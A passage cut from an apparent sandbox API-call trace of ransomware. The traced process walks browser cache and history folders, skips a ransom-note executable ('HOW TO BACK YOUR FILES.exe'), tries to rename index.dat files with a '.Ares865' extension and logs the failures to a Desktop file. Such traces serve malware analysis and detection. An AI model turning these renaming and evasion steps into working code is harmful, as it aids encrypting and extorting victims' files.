Files\\Content.IE5\\index.dat MoveFileEx error 32\r\n") returned 155 [0105.066] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0105.067] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x5e21 [0105.067] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x9b, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x9b, lpOverlapped=0x0) returned 1 [0105.067] CloseHandle (hObject=0x118) returned 1 [0105.067] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0105.067] CloseHandle (hObject=0x0) returned 0 [0105.068] CloseHandle (hObject=0x0) returned 0 [0105.068] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6b6382a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b6382a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MM5O9XQS", cAlternateFileName="")) returned 1 [0105.068] lstrcmpiW (lpString1="MM5O9XQS", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0105.068] lstrcmpiW (lpString1="MM5O9XQS", lpString2="aoldtz.exe") returned 1 [0105.083] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\History\\History.IE5\\index.dat.Ares865") returned 116 [0105.083] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\history\\history.ie5\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\History\\History.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\history\\history.ie5\\index.dat.ares865"), dwFlags=0x1) returned 0 [0105.083] GetLastError () returned 0x20 [0105.083] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\History\\History.IE5\\index.dat MoveFileEx error 32\r\n") returned 138 [0105.083] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\History\\History.IE5\\index.dat MoveFileEx error 32\r\n") returned 138 [0105.083] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0105.084] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x5ebc [0105.084] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x8a, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x8a, lpOverlapped=0x0) returned 1 [0105.084] CloseHandle (hObject=0x118) returned 1 [0105.084] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0105.084] CloseHandle (hObject=0x0) returned 0 [0105.084] CloseHandle (hObject=0x0) returned 0 [0105.084] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4dd91240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dd91240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSHist012019091320190914", cAlternateFileName="MSHIST~1")) returned 1 [0105.085] lstrcmpiW (lpString1="MSHist012019091320190914", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0105.085] lstrcmpiW (lpString1="MSHist012019091320190914", lpString2="aoldtz.exe") returned 1 [0105.085] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat.Ares865") returned 141 [0105.085] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\history\\history.ie5\\mshist012019091320190914\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\history\\history.ie5\\mshist012019091320190914\\index.dat.ares865"), dwFlags=0x1) returned 0 [0105.085] GetLastError () returned 0x20 [0105.085] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat MoveFileEx error 32\r\n") returned 163 [0105.085] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat MoveFileEx error 32\r\n") returned 163 [0105.085] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0105.086] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x5f46 [0105.086] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xa3, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xa3, lpOverlapped=0x0) returned 1 [0105.086] CloseHandle (hObject=0x118) returned 1 [0105.086] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0105.086] CloseHandle (hObject=0x0) returned 0 [0105.086] CloseHandle (hObject=0x0) returned 0 [0105.086] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3897c980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x83c55340, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 0 [0105.086] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0105.087] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7810 [0105.187] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat.Ares865") returned 150 [0105.187] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\temporary internet files\\content.ie5\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\temporary internet files\\content.ie5\\index.dat.ares865"), dwFlags=0x1) returned 0 [0105.187] GetLastError () returned 0x20 [0105.187] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat MoveFileEx error 32\r\n") returned 172 [0105.187] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat MoveFileEx error 32\r\n") returned 172 [0105.187] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0105.188] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x5fe9 [0105.188] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xac, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xac, lpOverlapped=0x0) returned 1 [0105.189] CloseHandle (hObject=0x118) returned 1 [0105.189] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0105.189] CloseHandle (hObject=0x0) returned 0 [0105.189] CloseHandle (hObject=0x0) returned 0 [0105.189] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6b6382a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b6382a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MM5O9XQS", cAlternateFileName="")) returned 1 [0105.189] lstrcmpiW (lpString1="MM5O9XQS", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0105.189] lstrcmpiW (lpString1="MM5O9XQS", lpString2="aoldtz.exe") returned 1 [0105.211] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat.Ares865") returned 133 [0105.211] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\history\\history.ie5\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\history\\history.ie5\\index.dat.ares865"), dwFlags=0x1) returned 0 [0105.211] GetLastError () returned 0x20 [0105.211] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat MoveFileEx error 32\r\n") returned 155 [0105.212] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat MoveFileEx error 32\r\n") returned 155 [0105.212] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0105.212] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6095 [0105.212] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x9b, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x9b, lpOverlapped=0x0) returned 1 [0105.213] CloseHandle (hObject=0x118) returned 1 [0105.213] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0105.213] CloseHandle (hObject=0x0) returned 0 [0105.213] CloseHandle (hObject=0x0) returned 0 [0105.213] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4dd91240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dd91240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSHist012019091320190914", cAlternateFileName="MSHIST~1")) returned 1 [0105.213] lstrcmpiW (lpString1="MSHist012019091320190914", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0105.213] lstrcmpiW (lpString1="MSHist012019091320190914", lpString2="aoldtz.exe") returned 1 [0105.214] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat.Ares865") returned 158 [0105.214] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\history\\history.ie5\\mshist012019091320190914\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\history\\history.ie5\\mshist012019091320190914\\index.dat.ares865"), dwFlags=0x1) returned 0 [0105.214] GetLastError () returned 0x20 [0105.214] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat MoveFileEx error 32\r\n") returned 180 [0105.214] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat MoveFileEx error 32\r\n") returned 180 [0105.214] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0105.214] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6130 [0105.214] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xb4, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xb4, lpOverlapped=0x0) returned 1 [0105.215] CloseHandle (hObject=0x118) returned 1 [0105.215] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0105.215] CloseHandle (hObject=0x0) returned 0 [0105.215] CloseHandle (hObject=0x0) returned 0 [0105.215] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3897c980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x83c55340, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 0 [0105.215] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0105.215] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e77d0 [0105.340] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat.Ares865") returned 167 [0105.340] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\index.dat.ares865"), dwFlags=0x1) returned 0 [0105.340] GetLastError () returned 0x20 [0105.340] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat MoveFileEx error 32\r\n") returned 189 [0105.340] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat MoveFileEx error 32\r\n") returned 189 [0105.340] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0105.353] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x61e4 [0105.354] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xbd, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xbd, lpOverlapped=0x0) returned 1 [0105.354] CloseHandle (hObject=0x118) returned 1 [0105.354] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0105.354] CloseHandle (hObject=0x0) returned 0 [0105.355] CloseHandle (hObject=0x0) returned 0 [0105.355] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6b6382a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b6382a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MM5O9XQS", cAlternateFileName="")) returned 1 [0105.355] lstrcmpiW (lpString1="MM5O9XQS", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0105.355] lstrcmpiW (lpString1="MM5O9XQS", lpString2="aoldtz.exe") returned 1 [0105.377] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat.Ares865") returned 150 [0105.377] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\history\\history.ie5\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\history\\history.ie5\\index.dat.ares865"), dwFlags=0x1) returned 0 [0105.377] GetLastError () returned 0x20 [0105.377] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat MoveFileEx error 32\r\n") returned 172 [0105.377] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat MoveFileEx error 32\r\n") returned 172 [0105.377] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0105.378] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x62a1 [0105.378] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xac, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xac, lpOverlapped=0x0) returned 1 [0105.379] CloseHandle (hObject=0x118) returned 1 [0105.379] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0105.379] CloseHandle (hObject=0x0) returned 0 [0105.379] CloseHandle (hObject=0x0) returned 0 [0105.379] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4dd91240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dd91240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSHist012019091320190914", cAlternateFileName="MSHIST~1")) returned 1 [0105.379] lstrcmpiW (lpString1="MSHist012019091320190914", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0105.379] lstrcmpiW (lpString1="MSHist012019091320190914", lpString2="aoldtz.exe") returned 1 [0105.380] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat.Ares865") returned 175 [0105.380] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\history\\history.ie5\\mshist012019091320190914\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\history\\history.ie5\\mshist012019091320190914\\index.dat.ares865"), dwFlags=0x1) returned 0 [0105.380] GetLastError () returned 0x20 [0105.380] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat MoveFileEx error 32\r\n") returned 197 [0105.380] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat MoveFileEx error 32\r\n") returned 197 [0105.380] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0105.380] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x634d [0105.381] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xc5, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xc5, lpOverlapped=0x0) returned 1 [0105.381] CloseHandle (hObject=0x118) returned 1 [0105.381] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0105.381] CloseHandle (hObject=0x0) returned 0 [0105.381] CloseHandle (hObject=0x0) returned 0 [0105.381] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3897c980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, 